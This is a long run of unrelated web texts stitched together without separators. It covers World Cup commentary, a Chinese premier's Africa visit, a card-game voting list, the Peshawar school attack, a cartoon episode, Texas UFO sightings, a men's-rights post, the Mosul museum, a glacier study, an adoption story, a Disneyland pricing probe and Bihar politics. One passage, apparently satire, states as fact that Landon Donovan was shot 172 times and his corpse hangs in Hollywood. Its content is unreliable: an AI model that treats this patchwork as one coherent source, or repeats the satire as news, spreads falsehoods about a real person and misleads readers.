So many injuries for # USA . Too many . Have to question Klinsmann 's preparation . # WorldCup — Nick Sabetti ( @ nicksabetti ) June 16 , 2014
Just wonder how big a part Klinsmann 's intense pre-World Cup training camp has played in these injuries for the USA . — Graham Ruthven ( @ grahamruthven ) June 16 , 2014
6 . Jones was beyond excellent . I 've hated him in the central midfield for the US for a long time , but pushing him out left for the last two games has resulted in two wins largely thanks to his box-to-box play . He was fantastic . I ca n't say enough good things about his work today .
5 . Kyle Beckerman was just as good as Jones . He 's so positionally sound and smart at d-mid , he allows everyone else to run around and pressure where they want . And then when the entire team is on the back foot , he sweeps in front of the central defense like the elite reader of the game he is .
And in retrospect , Bob 's biggest mistake in 2010 was not bringing Kyle Beckerman . Dude 's been a monster today . — Matthew Doyle ( @ MLSAnalyst ) June 16 , 2014
He allowed nothing up the middle . Compare that to 2010 , when the US were far too soft in Zone 14 .
4 . I 'm so happy Dominic Oduro is miserable right now :
HAHAHAHAHA USA HAHAHAHAHA , I DIDNT EVEN KNOW GHANA SCORED UNTIL MY PHONE NOTIFIED ME # HAHA — Dominic Oduro ( @ Freakyfast8 ) June 16 , 2014
3 . While Jones and Beckerman were great , Michael Bradley was plain bad . Amazing for him to take a mulligan but the US gets three points . Never would have predicted that .
2 . Now onto the tough part : Klinsmann screwed up his roster selection . He really did .
Neither Aron Johannsson nor Chris Wondolowski can do the target-forward work that the US need to have out there in order to avoid getting pressed to death . It 's not that punting up to a No . 9 is a great strategy – it 's not . It 's that sometimes it 's the best strategy left when your midfield is getting overrun .
Ghana welcome to press now without Jozy . Really furious about this . — Matthew Tomaszewicz ( @ shinguardian ) June 16 , 2014
Jozy , and Eddie Johnson and ( in theory ) Terrence Boyd can do that kind of work . We saw ArJo provide nothing of the sort today – he had almost no impact on the game – and we all know how Wondo struggles in MLS play without Steven Lenhart or Alan Gordon running interference .
How 's he going to do against Portugal and Germany ?
Expect the US to get pressed to death for the next 180 minutes . Which means ...
1 . We 're back to Bora Ball . People do n't want to admit it , but this team plays more like the 1994 US World Cup team than any of the following ones . We defend in deep blocks , we run our guts out , we kill you on set pieces .
Klinsmann did n't deliver the soccer revolution he promised – not even close . But Bora got us through the group playing the Ugly Game two decades ago , and with three points in our back pockets , there 's no reason to aim for anything less this time around .
Bring on Manaus .
China 's prime minister is emphasizing his nation 's commitment to investing in Africa during a visit to the continent .
Prime Minister Li Keqiang spoke Monday on China-Africa relations at the AU headquarters building , which was financed by China as a gift to the continent .
China 's policy towards Africa will focus in the next year on industrial cooperation , financial cooperation , poverty reduction , environmental protection , cooperation on cultural exchanges , and supporting peace and stability on the African continent .
Prime Minister Li said he wants to expand trade between Africa and China .
He said China and Africa should strive to reach $ 400 billion in annual trade and $ 100 billion of Chinese direct investment in Africa by 2020 . He said China will take an active part in the industrialization in Africa .
It is the first visit of Prime Minister Li to the African continent since he assumed office last year .
China 's trade with Africa totaled $ 210 billion in the past year . It is estimated China has also given more than $ 75 billion in the past decade for aid and development projects .
U.S. Secretary of State John Kerry is also traveling in Africa . While the U.S. State Department is focusing much more on peace and stability , the Chinese visit is focused on strengthening trade cooperation .
Li said trading with China comes with no political strings attached .
He said that neither side seeks to impose its will on the other or interfere in the other 's internal affairs .
On Tuesday , Prime Minister Li will meet Ethiopia 's President Mulatu Teshome . After visiting Ethiopia and the African Union , Li will visit Kenya , Nigeria and Angola .
You can now vote in Batch 95 !
Currently open batches :
Batch 95
Batch 94
Batch 93
Batch 92
Batch 91
Batch 90
Batch 89
Batch 88 results will be up shortly .
Feature match : Powerful Commander multiplayer removal spell Malicious Affliction has its work cut out trying to take down Soul of Theros , one of the biggest Limited beatsticks ever printed .
Full list of matchups :
Engineered Plague vs Shambleshark
Overwhelming Forces vs Rolling Thunder
Mistfire Adept vs Helix Pinnacle
Smelt vs Galerider Sliver
Mistform Dreamer vs Hedonist 's Trove
Voidmage Prodigy vs Thalakos Seer
Odric , Lunarch Marshal vs Spiteful Blow
Sight Beyond Sight vs Marionette Master
Makeshift Mannequin vs Ishkanah , Grafwidow
Temple of Epiphany vs Living Totem
Touchstone vs Siege Behemoth
Cinder Seer vs Nature 's Lore
Fold into Aether vs Fuel for the Cause
Alpha Kavu vs Gustcloak Skirmisher
Ride Down vs Brilliant Spectrum
Virtue 's Ruin vs Augury Owl
Spell Burst vs Steward of Valeron
Meditate vs Close Quarters
Whisk Away vs Escaped Shapeshifter
Dungrove Elder vs Squee 's Revenge
World-Bottling Kit vs Bringer of the Blue Dawn
Blessed Alliance vs Darksteel Forge
Eager Construct vs Consecrated Sphinx
Yavimaya Coast vs Rasputin Dreamweaver
Runeflare Trap vs Steel of the Godhead
Dense Foliage vs Commune with the Gods
Ooze Garden vs Intrepid Hero
Wings of the Guard vs Gilt-Leaf Winnower
Alliance of Arms vs Dingus Staff
Adder-Staff Boggart vs Echoing Truth
Gruul Ragebeast vs Crypt Incursion
Malicious Affliction vs Soul of Theros
Professional Soccer Player
In a year when so much went wrong for America , one would be hard-pressed to find a more tragic event than the beloved U.S. national team 's elimination from the 2010 World Cup . The humiliating loss—which left millions of enraged citizens rioting in every major city—was universally blamed on disgraced team captain Landon Donovan .
Advertisement
After the U.S. team won its group in the first round , an estimated 300 million Americans , widely known as the most fanatical soccer fans on the planet , shuttered local businesses , declared a holiday from school , and even closed down the New York Stock Exchange to watch the second-round match against Ghana , only to see their collective hopes dashed by Donovan 's subpar play . Mass burnings of Landon Donovan effigies and widespread looting ensued , forcing President Barack Obama to declare a state of national emergency .
Despite receiving thousands of death threats and a personal warning from the State Department urging him to stay off American soil until order could be restored , Donovan returned to Los Angeles and was shot 172 times in the chest , head , and feet by an unknown number of assailants—a crime that remains unsolved to this day as police refuse to investigate .
Donovan 's decomposing corpse still hangs from the marquee at Grauman 's Chinese Theatre in Hollywood , where hundreds of passersby spit on it each day .
Best reply I got from an # HR # Agency which I publish here :
`` Thank you for your interest in Our Recruitment Agency .
Before we can help you , we need to know if you have a valid work permit for The EU . It is not stated in your resume . It is important to us because , unfortunately , without any valid working permit ( for the non-EU citizens except for Japanese citizens ) it will be difficult for us to help you to find a job .
There are two ways of getting a work permit for a non-EU citizen . The first way is to apply for a job through the company itself . That means that you can not apply for a job through a recruitment agency like `` XXX '' as our clients require that all candidates have their paperwork in order . The application process for a work permit could take up to six months . Before starting this procedure , the company has to prove that it is in their best interest to hire you , above all , first from our country and than the EU candidates . They have to prove that the job has been advertised for at least six weeks and that they have interviewed local and EU candidates but still they are not able to find a suitable employer for the job . The company has to convince the CWI ( the Centre for Work and Income ) that you are the most suitable person for the position .
Secondly , you can apply for a residence and working permit if you have a local or EU partner/spouse . Your partner must be living and working in The EU and willing to sponsor you . It is essential that your partner agree to be financially responsible for you while you are in The EU . The two of you must prove that you have a relationship and that you are living together . If the relationship should end or one of you should move out , the permit will no longer be valid .
If you want to apply to companies yourself , then I would suggest that you start searching the internet and check out job boards such as Monsterboard or toplanguagejobs
If you have any more questions about work permits you can inquire at the www.ind.nl ( telephone 0900 123 4561 or from outside the Netherlands 0031 20 889 3045 ) . Extra information can also be found on www.workpermit.com . Although we try to inform you as accurate as possible , please note that we are not experts on this matter .
We are not able to help those candidates who are still living abroad as our jobs are for direct fulfillment . If you do not plan to move in several months , there is no point in starting your job search yet . Please contact us after you have arrived in The EU . Then we will have a better idea of what kind of vacancies are available .
Foreign students are often granted with a work permit which allows them to work a maximum of 12 hours per week . With this type of permit , we will , unfortunately , not be able to help you . We rarely have part-time or temporary jobs available ; most of our jobs are full-time or permanent .
Met vriendelijke groet/kind regards ,
`` XXX '' Recruitment Agency B.V . ''
Thank you very much for this reply you are the # BEST !
But I am determined to overcome all the obstacles and succeed in my Quest ! # NeverGiveUp
In an act of terror reminiscent of the 2004 Beslan massacre and the handiwork of Nigeria 's Boko Haram , Taliban fighters attacked a school in Peshawar , Pakistan today , killing at least 132 pupils and nine teachers , including a female instructor who was alive when the attackers doused her in gasoline and set her alight in front of her class .
The Tehreek-e-Taliban Pakistan ( Pakistani Taliban ) has claimed responsibility for the attack and said it was in revenge for an anti-terrorist military offensive . Spokesman Muhammad Khorasani said it was “ just the trailer ” to further attacks .
According to the New York Times ,
The militants ' assault started at about 10 a.m. , when nine gunmen disguised as paramilitary soldiers climbed the rear wall of the Army Public School and Degree College , a school of about 2,500 pupils , including boys and girls , a senior security official said . … As Pakistani security forces responded , some of the attackers blew themselves up while others were killed by members of the army 's Special Service Group commando unit . Desperate parents , meanwhile , rushed to local hospitals or gathered outside the school gates seeking news of their children . One of them , Muhammad Arshad , described his relief after his son Ehsan was rescued army commandos . “ I am thankful to God for giving him a second life , ” he said . But at the Combined Military Hospital , the bodies of schoolchildren were lined up on the floor , most of them with single gunshot wounds to the head .
“ They burned a teacher in front of the students in a classroom , ” [ an ] unnamed military source told the US TV network . “ They literally set the teacher on fire with gasoline and made the kids watch . ”
And :
According to a tweet by Omar R. Quraishi , an editor at The Express Tribune who has over 154,000 Twitter followers , “ Some of the bodies brought to hospital during the Peshawar school attack have been headless : source . ”
One expert on Islamist terror , Ahmed Rashid , said that
… the insurgents had various reasons to attack the school , one of which was to send a message to the supporters of Malala [ Yousafzai ] , who advocates education for women and children . … Rashid also believes the Taliban targeted the school to demoralize the military .
The school , though founded to educate the children of army officers , has many pupils who come from civilian backgrounds .
( Image via Shutterstock )
It turns out that Knuckles the Echidna is a huge feminist .
As the father of two brilliant young women under the age of 8 , I 'm constantly on the lookout for children 's shows with positive portrayals of women . It looks like I 'm going to have to add Sonic Boom to the list .
The most recent episode , which aired on Cartoon Network over the weekend , was called “ Eggman 's Anti Gravity Ray. ” In one particular scene , Amy Rose gives herself a little pep talk before taking a penalty kick in a pickup soccer game .
“ Can the young woman break the glass ceiling , ” Amy says , “ and prove once and for all that a female can be just as good an athlete as a male ? ”
Knuckles looks on , arms crossed , and gives her a pep talk of his own .
“ You know , Amy , ” chides the burly echidna , “ anytime someone calls attention to the breaking of gender roles , it ultimately undermines the concept of gender equality by implying that this is an exception and not the status quo . ”
Upon seeing this scene play out on YouTube , I resisted the urge to call up and berate my elderly neighbor for handing my oldest a shiny new quarter simply because she had a pretty dress on . So thanks for that , at least , Sonic Boom writing team .
But seriously , that 's some pretty heady messaging for a children 's show . Everyone on the pitch stands there , Sonic included , mouth agape .
“ What ? ” says Knuckles . “ Just because I 'm a meathead does n't mean I 'm not a feminist . ”
The show 's executive producer says that the episode was written by Marie Beardmore . But it was another one of Sonic Boom 's writers , Alan Denton , who went to Twitter to crow about it .
The worst part about writing for kids is that my friends rarely see my work . The best part is we get to do stuff like this . # SonicBoom pic.twitter.com/lkWwaR6WgI — Alan Denton ( @ AlanTheWriter ) July 30 , 2017
“ The worst part about writing for kids , ” Denton said , “ is that my friends rarely see my work . The best part is we get to do stuff like this . ”
The tweet has , as of the time of this writing , nearly 40,000 likes .
Now , if you 'll excuse me , it 's almost time for today 's episode of Odd Squad on PBS , and I 'm out of juice boxes and string cheese .
Witnesses claim F-16s chased flying saucer across Texas skies David Edwards and Muriel Kane
Published : Tuesday January 15 , 2008
del.icio.us |
Print This Email These Dozens of eyewitnesses have reported seeing a mile-long UFO being pursued by fighter jets last week in the small town of Stephenville , Texas . `` It was very intense bright lights ... and they spanned a wide area , '' said one woman . Fox News interviewed Peter Hartinger of the Roundtown UFO Society in Ohio , who was reluctant to offer any conclusions but called the reports `` interesting '' and said that members of the Mutual UFO Network will be going down to check them out . NBC News spoke with County Constable Lee Roy Gaitan , who offered a somewhat different description . `` I saw two red glows , '' he said . `` They glowed and then they kind of faded and glowed again . ... I thought , boy , that 's just not right . '' Gaitan described the lights changing color , dancing around , and finally shooting away at an incredible speed . `` I have never seen anything like that , never , '' he concluded . However , the Associated Press quoted Gaitan as saying , more cautiously , `` I didnt see a flying saucer and I dont know what it was , but it wasnt an airplane , and Ive never seen anything like it , I think it must be some kind of military craft  at least I hope it was . '' This video is from Fox 's America 's Newsroom and Independent Television News , broadcast January 15 , 2008 .
In the following video a witness recalls recent UFO sightings in Texas .
This video is from NBC News , broadcast January 15 , 2008 .
Update : Please note that this notice is out of date , and CAFE has raised the extortion money . Now let 's hope they sue to get it back.–DE
Just when you think the Gender Ideologue hatemongers ca n't get dirtier , they get dirtier . AVfM Contributing Editor Karen Straughan explains : the Miles Groth lecture sponsored by CAFE is under threat , and need help :
I can tell you that we are already planning not just how to get them the money but also how to challenge this in court on CAFE 's behalf . Fuck these people for pretending the issue is the advocates for men and boys , as opposed to the real problem : the violent thugs calling themselves feminists who barricade doors and try to stop a non-violent human rights movement that gives a shit about men and boys .
* Update * : More on the assault on CAFE right here .
Note : Please do NOT make donations to AVFM for CAFE . Kindly visit their website and provide assistance there . AVFM has no affiliation with CAFE and we can not engage in any financial transactions with them . Thank you . PE
Update : Please note that this notice is out of date , and CAFE has raised the extortion money . Now let 's hope they sue to get it back.–DE
A grant aimed at attracting beneficiaries to take up full-time work in Christchurch , has been abused by some .
More than 50 beneficiaries who accepted a $ 3000 grant to work in Christchurch have been forced to return the money .
The 3K to Christchurch scheme was introduced July 2014 in an effort to help Work and Income job seekers relocate for full-time employment . They were offered a one-off $ 3000 payment .
Figures released to RNZ showed one out of every 40 who took the grant had to give money back .
READ MORE : Fraud suspected in '3k to Christchurch ' scheme
Of the more than 2000 grant recipients , 51 had to return the money because they did not meet the conditions of the grant . A further 15 people took the grant disingenuously , resulting in eight prosecutions .
It is not the first time , beneficiaries were found to have taken advantage of the scheme .
In August 2014 , it was reported that 12 people throughout the country , including two in the southern region , were being investigated because they had taken the $ 3000 but not shown up to work .
Most of the jobseekers had been employed in construction .
In December 2014 , Timaru company United Scaffolding , which operates around the South Island , said of the `` six or seven '' people it offered jobs to through the scheme , just one had shown up for work .
In December 2015 , the Government reported that of the more than 1700 clients who had taken advantage of the scheme , 92 per cent of those remained off a benefit for longer than 91 days , 33 per cent were aged 24 or younger , with 53 per cent employed in the construction sector .
* Comments on this article have closed .
MOSUL , Iraq ( Reuters ) - After two and a half years under Islamic State control , all that is left in Mosul 's museum are the traces of looting and destruction .
Inside the rubble-strewn building , where militants filmed themselves destroying ancient artifacts , the large stone wing of a statue of lamassu — an Assyrian winged bull deity — lies on the dusty floor among other broken remnants of the past .
A block engraved with Arabic Islamic calligraphy lies close by , and some Islamic manuscripts have been left undamaged . But almost everything else has gone .
“ What they did n't loot they destroyed , ” said Lieutenant Colonel Abdel Amir al-Mohammedawi , of Iraq 's elite Rapid Response units , who captured the museum building from Islamic State just days ago .
The battle against the militants still raged nearby on Saturday , however , as a Reuters cameraman visited the site with Iraqi troops .
Dozens of Assyrian , Akkadian , Babylonian , Persian and Roman artifacts that the ransacked museum held have all been stolen or damaged .
“ Some were smuggled out of Iraq , ” Mohammedawi said .
A destroyed artifact is seen at a museum , where Islamic State militants filmed themselves destroying priceless statues and sculptures in 2015 , during a battle against the militants in Mosul , Iraq , March 11 , 2017 . REUTERS/Thaier Al-Sudani
Islamic State militants filmed themselves smashing some of the building 's contents including priceless statues with sledgehammers in 2015 , as part of their highly publicized campaign to erase any cultural history that contravenes their extreme interpretation of Sunni Islam .
SOURCE OF INCOME
But they have also used the antiquities as a source of income . Excavations under an ancient mosque elsewhere in Mosul , recently discovered after the militants retreated , showed that they took care of artifacts for loot .
The efforts to avoid damaging some antiquities contrast with the destruction of ancient sites across Islamic State 's self-declared caliphate in Syria and Iraq , from the desert city of Palmyra to the Assyrian capital of Nimrud , south of Mosul .
The United States has said the looting and smuggling of artifacts has been a significant source of income for the militants . In July 2015 , U.S. authorities handed Iraq a hoard of antiquities it said it had seized from Islamic State in Syria .
A U.S.-backed Iraqi campaign dislodged Islamic State from most Iraqi cities captured in 2014 and 2015 . The militant group is now fighting in its last major urban stronghold , in the western part of Mosul , where the museum is located .
The outside of the building , which features Roman-style columns , is blackened from shell or rocket blasts and peppered with bullet holes .
Slideshow ( 16 Images )
A Chaldean Catholic church next to it has also been mostly gutted , its altar cracked down the middle .
The body of an Islamic State fighter lay just outside the church on Saturday , days after the fighting had moved further forward .
Iraqi troops dusted off some of the historical stone slabs lying on the floor in the museum , which lies just outside Mosul 's old city — one of the final Islamic State strongholds in Mosul .
HANOVER , N.H. - Surface meltwater draining through and underneath Greenland 's tidewater glaciers is accelerating their loss of ice mass , according to a Dartmouth study that sheds light on the relationship between meltwater and subglacial discharge .
The findings appear in the journal Annals of Glaciology . A PDF is available on request .
Greenland has the potential to contribute six to seven meters of global sea level rise predominantly through ice mass lost out of large tidewater glaciers . The study 's findings will be used in modeling how water influences glacier melt , glacier flow and glacier stability and to predict global sea level rise for Intergovernmental Panel on Climate Change reports .
`` Our results show meltwater from these glaciers is playing a larger role in glacier stability than previously thought , '' says lead author Kristin Schild , a doctoral student in Dartmouth 's Department of Earth Sciences . `` A clearer understanding of subglacial hydrology at tidewater outlet glaciers is important for understanding the mechanisms controlling fluctuations in ice flow and submarine melt as well as gauging the impact of rapid freshwater delivery to the fjord system . ''
Media reports about glacial melting are common , but less attention has been paid to how glaciers are losing mass . Surface meltwater can exploit weaknesses in glaciers , fracturing and weakening the ice as it drains to the bottom . Water under glaciers decreases the friction between the ice and rock , causing the glaciers to move faster . When fresh meltwater exits the glacier into the ocean , it brings warm saltwater to the glacier terminus , which causes melting of the glacier from below ( submarine melting ) . Once this freshwater hits the surface of the ocean , it helps disintegrate the mélange ( recently calved icebergs and sea ice ) that stabilizes the glacier terminus . Tidewater outlet glaciers discharge most of the Greenland Ice Sheet 's mass through iceberg calving , submarine melting and meltwater runoff . While calving can be observed in person and with remote sensing observations , it is difficult to assess melting within and below glaciers and how the meltwater is discharged .
The Dartmouth team studied a fast-flowing West Greenland tidewater glacier , using time-lapse photography , modeled runoff estimates and ground and satellite imagery to determine how much of the glacier is experiencing melt and when meltwater exits the glacier and enters the fjord . The timing between melt onset and when the meltwater emerges shows how the meltwater travels through and below the glacier .
Their results show that multiple intense plumes of sediment-rich meltwater can occur across a glacier 's terminus , which has n't been documented previously , and can increase calving and melting ; sediment plumes can break apart the mélange , which weakens the stability of the glacier terminus ; and meltwater is being stored under the glacier , which can speed up the glacier 's velocity .
# # #
Kristin Schild is available to comment at Kristin.M.Schild.GR @ dartmouth.edu . Also , Kristin Schild talks about what 's happening underneath the glaciers .
The research was supported by the National Science Foundation .
A 5-day-old baby , umbilical cord still attached , abandoned at a bus stop in China .
A puppy , worm-infested , vomiting blood and starving to death on a porch in Topeka .
Two creatures born to misery worlds apart but brought together to teach each other about love , family , faith and , above all , about trust .
`` It 's OK , '' the little girl would whisper in his floppy ear the first time they meet . `` Marvin , I got left behind , too , once . But sometimes , God does that so you can end up in the family you 're supposed to be in . ''
Eden
When Kathryn and Kirk White brought their 9-month-old baby home from China in August 2005 , the 33-year-olds decided to name their second daughter Eden .
`` As in the Paradise , '' Kathryn White said Tuesday . `` Because she was so beautiful . ''
The early years were a breeze , compared to the stories the Whites had heard about other abandoned babies . Eden was all smiles , even with Kirk — likely one of the first men who had ever held her .
It was n't until she was about 3 years old that she started waking up screaming in sheer panic .
White had read that for some children , night terrors were the manifestation of the abandonment they knew as a child . But that did n't make them any easier to handle .
`` She was in a constant state of being afraid , of being left , '' White said . `` She could n't calm down enough to get a good sleep . ''
Sometimes , Eden would be sleep walking , repeating the same phrase — `` I do n't want you to leave . ''
This went on for years , progressively getting worse and more frequent until it was just about every night .
`` No one was sleeping , '' White said . `` You do n't realize how important sleep is until you stop getting it . ''
The Whites tried everything , from taking turns sleeping with her to waking her up every time someone was going to leave the house . She would want to give her dad and sister , Peyton , tons of kisses , in case they did n't come back .
Last summer the couple , firmly against the idea but at their wits ' end , finally started to cave . It was time to look into getting Eden what she always wished upon a star for : A dog .
Marvin
Meanwhile , a 1-year-old brindle mix , then named Pork Chop , laid starving and vomiting blood on a porch across Topeka .
He had been abandoned by his former owners , left as a neighbor 's problem . The neighbor , out of money , phoned who people call in such instances : Maureen Cummins , co-owner of Second Chance Animal Refuge Society in Auburn .
`` This dog is dying , '' Cummins said when she saw Pork Chop , noting to herself the dog had never even seen the food of his namesake .
She immediately took him to the nearest veterinarian , who diagnosed him with three types of worms , possibly a bleeding ulcer and acute diarrhea , which was compounded by starvation . He weighed less than 20 pounds .
Marvin was given the OK to leave one week later , but he was n't out of the woods yet .
The next two months were a blur of feeding , antibiotics , vitamins and exercise , Cummins said . And she renamed him Marvin — as in Starvin ' Marvin .
By August , Marvin was up to 50 pounds and , while still shy , he was more energetic and active with the other 50 dogs at the refuge .
`` Someday , '' Cummins assured him , staring into his gentle eyes , `` you will be strong , and you will be someone 's hero . ''
Then , the Whites called .
They meet
All Cummins knew about Eden was that she was adopted and she needed to feel safe — not that she had been abandoned as an infant or suffered horrific night terrors .
With that information , the refuge workers came up with a list of qualities Eden needed in a dog : Calm , good with children , never shown any sign of aggression , no accidents , big enough to intimidate strangers , but safe and loving .
Marvin fit the ticket .
But when he bounded out of Cummins ' vehicle that fateful August day last year , White was having second thoughts .
`` I was thinking something small she could put bows on , '' White said . At 50 pounds , Marvin weighed more than Eden , and he had a face like a pit bull — White had heard the stories .
But Eden took to him immediately , and the two started playing and running around in the backyard while both women watched with careful eyes .
Cummins had n't known Eden 's background , but as White described it , she started to cry .
It was then Eden pulled Marvin aside , when she told him bad things happen sometimes so God can bring the right families together .
`` To me , that is what rescue is about , '' Cummins said .
Inseparable
In the past nine months , Marvin has become an central figure in the White family , despite breaking all of Kathryn 's rules about being inside , sleeping on the bed and sitting on the furniture . Family members describe him differently : For Eden , he is a best friend , a baby , a cuddle buddy . For White , he is her child 's protector . For Peyton , 13 , he is a brother .
But as much as everyone loves Marvin , there is something special between him and Eden .
`` They 've been like this from the start , '' White said , nodding to where her daughter laid on top of Marvin , showering him with kisses . `` He loves all of us , but he and Eden have A Thing . ''
Eden , now 9 , knows exactly why they get along so well .
`` Because we 're alike , '' she said in the soft , shy way she has . `` We do n't like to be alone . ''
Each morning , Eden takes time to explain her day to Marvin : Why she is leaving and when she will be back — something she used to require of her own family . That does n't keep Marvin from trying to stop her , by grabbing onto her backpack or lying in front of the door .
Eden said she does n't like how Marvin was found and would rather he forgets it . On one trip to the veterinarian , as the doctor was going over Marvin 's history — the worms , the bleeding , the starving — Eden quickly cupped her hands over her friend 's ears .
`` I do n't think he remembers much of it , '' she chided the vet . `` I want to keep it that way . ''
That was a mouthful for her little girl , White said .
Another change : The Whites ca n't remember the last time Eden woke up screaming .
Marvin 's initial jitters at the slightest noise have subsided , too , White said .
`` The point was for him to make her feel more secure , but I think she 's done that for him , too , '' she said . `` When you 've got somebody who needs you , you 're not so focused on what you need anymore . ''
Marvin has become a security blanket for her daughter , White said , the embodiment that everything will be OK , that she can count on someone .
`` He 's a symbol of trust , '' she said . `` And vice versa . ''
Image copyright Getty Images
Disneyland Paris is facing a pricing probe following accusations that UK and German customers are being frozen out of certain price promotions .
The Financial Times said people in the UK were paying 15 % more for one day tickets .
The European Commission told the BBC that it had `` received a number of complaints '' from customers .
A Disneyland Paris spokesman said promotions were seasonal .
The newspaper said in a report that in some cases French consumers were paying €1,346 for a premium package , while British visitors were charged €1,870 and Germans €2,447 .
The European Commission is concerned that Disneyland Paris is stopping consumers in some member states from shopping around for the best deals , EC spokeswoman Lucia Caudet told BBC Business online .
Under European law , firms can not stop consumers from doing this , she said .
Image copyright Getty Images
The BBC understands that consumers in countries including the UK , Germany and Italy have made pricing complaints .
The problem potentially lies in , for example , a UK holidaymaker trying to order a Disneyland Paris ticket from a French website but being unable to pay because they do not have a French credit card .
The French government has now been asked to investigate .
A spokesman for Disneyland Paris said that the price of a standard ticket was the same across the European Union market .
He said that the firm runs different promotions at specific times of year based around , for example , seasonal events and school holidays .
Customers are not subject to so-called geo-blocking , where promotions are closed to those people whose computers are located in a certain country , the spokesman said .
But he added that customers would not be able to directly pay for tickets for a promotion for a certain country unless their credit or debit card is registered in that country .
`` It 's an anti-fraud measure , '' he said .
Prime Minister Narendra Modi 's Parivartan rally in Bhagalpur has added a new dimension to the pre-election announcements-driven campaign thrust in Bihar . The rally was watched closely by both , his supporters and his political rivals — the JD ( U ) , RJD and the Congress — to see how he would respond to the heat and dust generated by the so-called secularist alliance Mahagathbandhan 's Swabhiman rally in Patna held only two days ago .
The choice of Bhagalpur as the venue for Modi 's final rally before the Election Commission announces the Bihar poll schedule was an interesting one . Although in decline , Bhagalpur is the silk city of Bihar , and home to Danveer Karna ( mythological king of Anga Pradesh ) — one of the central characters and most acclaimed warriors of the Mahabharata — and the ancient Vikramshila University .
In contemporary history however , the town is better known for the 1979-80 police-sponsored blinding cases and the 1989 riots . Its demography comprises an almost equal percentage of people from the Yadav and Muslim communities ( around 15 percent each ) , and a mix of other castes and social groups .
Of the four Parivartan rallies held by Modi so far , Bhagalpur represented the smallest number catchment area — in terms of the relative number of Assembly seats — vis-à-vis Muzaffarpur , Gaya and Saharsa , where he held his earlier rallies . But the ground chosen for the Bhagalpur rally was over three-and-a-half times bigger than Patna Gandhi Maidan where the Nitish Kumar-Lalu Yadav-Sonia Gandhi combine held its Swabhiman rally .
To put this into perspective , the Patna Gandhi Maidan is spread across 63 acres , while the Bhagalpur Airport Maidan covers a sprawling 203 acres . Meanwhile , the prime minister 's two other Bihar rallies — one in Patna and the other in Ara — were listed as official government functions , and can not be counted as part of the Parivartan series .
Apart from the change in scale , the tone and tenor of Modi 's speech was also markedly different in Bhagalpur . In a departure from the pitch he had made in his three other Bihar outings , he infused his speech with more substance than rhetoric . Those who hoped that Modi would provide a strong rebuttal to the barbs aimed at him by Lalu , Nitish and Sonia at their Patna rally were left slightly disappointed .
Although his speech contained scathing attacks on his rivals — he continued with the theme of ‘ betrayal ' against Nitish , and added Lalu to the list of ‘ betrayers ' — he wisely chose to speak at length about development . The list of leaders and allies with whom the dais would be shared , was equally strategic , with former Union minister and the BJP 's most prominent Muslim face Syed Shahnawaz Hussain appointed the convener of the rally .
In Patna , Nitish Kumar had raised the ‘ Bihari DNA ' issue and equated it with an “ insult of Bihar ” , in an effort to give his discourse an emotional spin . Meanwhile , Lalu tried hard to paint the upcoming election with caste-ist hues , by openly talking about another social conflict that he dubbed ‘ Mandal Raj Part II ' .
Modi , on his part , avoided explicitly naming the caste issue , but the message was clear .
There was significance in his repeated mentions of legendary socialist leader and two-time chief minister Karpoori Thakur ( from the Nai or barber community ) , whose reservation formula had a special category for the most backward castes among the OBCs . Notably , he also mentored Lalu and Nitish , in the same manner as Ram Manohar Lohia and Jaiprakash Narayan ( JP ) . In Patna , Nitish said that he had learnt lessons of democracy from sitting at JP 's feet , however it has been a long time since either Nitish or Lalu referred to Thakur , vis-à-vis their political lineage .
By invoking the memory of Thakur , Modi reached out to the Extremely Backward Classes ( EBC ) and Most Backward Classes ( MBC ) , while simultaneously drawing a distinction between the years Thakur was chief minister and the ones that saw his forgetful protégées in the proverbial hot seat . By referring to Lalu and Nitish 's perceived repudiation ( tilanjali ) of the values inculcated in them by Lohia , Thakur and JP , Modi has provided the Bihar electorate with a talking point that the JD ( U ) -RJD-Congress leaders and workers might find very difficult to counter .
The outcome of the Bihar election will depend on how the Mahadalits , EBCs and Yadavs vote . The upper castes , for all practical purposes , will side with the BJP . The Muslims — comprising 17 percent of the population — are likely to vote for the Mahagahthbandan even as All India Majlis-e-Ittehadul Muslimeen president Asaduddin Owaisi 's visit to Bihar is creating tension within the JD ( U ) -RJD-Congress ranks .
Owaisi has the potential to damage the secularist combine 's prospects in some constituencies , if that is , he does not win all on his own . Nitish had earlier cultivated the Mahadalit community , but the way he dealt with former chief minister Jitan Ram Manjhi , has ruined his chances . With Ramvilas Paswan and Manjhi siding with the BJP , the Mahadalit votes is likely to go in favour of the NDA . The EBC vote and a fragmentation of Yadav votes — if at all that happens — will tilt the scales in the BJP 's favour .
Lalu has survived for all these years on his famed M-Y ( Muslim-Yadav ) combination . However , in the Parliamentary election , the younger Yadav voters deserted the RJD — thereby costing Lalu 's wife Rabri Devi and daughter Misa Bharti the election — and voted for Modi .
By seeking explanations for the past 25 years ( under Lalu-Rabri-Nitish rule ) , Modi has turned the tables on them : “ A youth born in 1990 is today 25 years old , and he has every right to know what his rulers delivered for him , ” said Modi .
For 15 years , Lalu and Rabri were messiahs of underdevelopment , while Nitish 's claim to fame had been the restoration of law and order in the state since 2005 — when he aligned with the BJP to oust the Lalu-Rabri regime . It was on the basis of some visible changes in statecraft that saw Nitish and the BJP receive an unprecedented 75 percent mandate in 2010 . But in his second innings spanning 2010 to 2015 , Nitish has no achievement to claim as his own . Some of his critics have even suggested that the difference between his first and second terms was just as stark as the difference between UPA-I and UPA-II at the Centre .
Ultimately , Modi 's Bhagalpur rally saw far greater attendance than the Mahagathbandhan 's Patna rally , according to many who attended both . And by bringing the narrative back to development , Modi has done two things : He has re-established his credentials as a development-oriented leader and tried to convince voters to rise above the caste lines and vote for the BJP , despite the major role caste plays in their social and political psyche . In the 2010 Assembly elections and 2014 Parliamentary election , the vote had been for development , subsuming caste-ist boundaries . Modi and the BJP will hope for a repeat of the same phenomenon .
Firstpost is now on WhatsApp . For the latest analysis , commentary and news updates , sign up for our WhatsApp services . Just go to Firstpost.com/Whatsapp and hit the Subscribe button .
AR15 Rifle-Stingray ( R ) 10.5 556 10 '' HD Quad Rail SS Suppressor Rifle Categories :
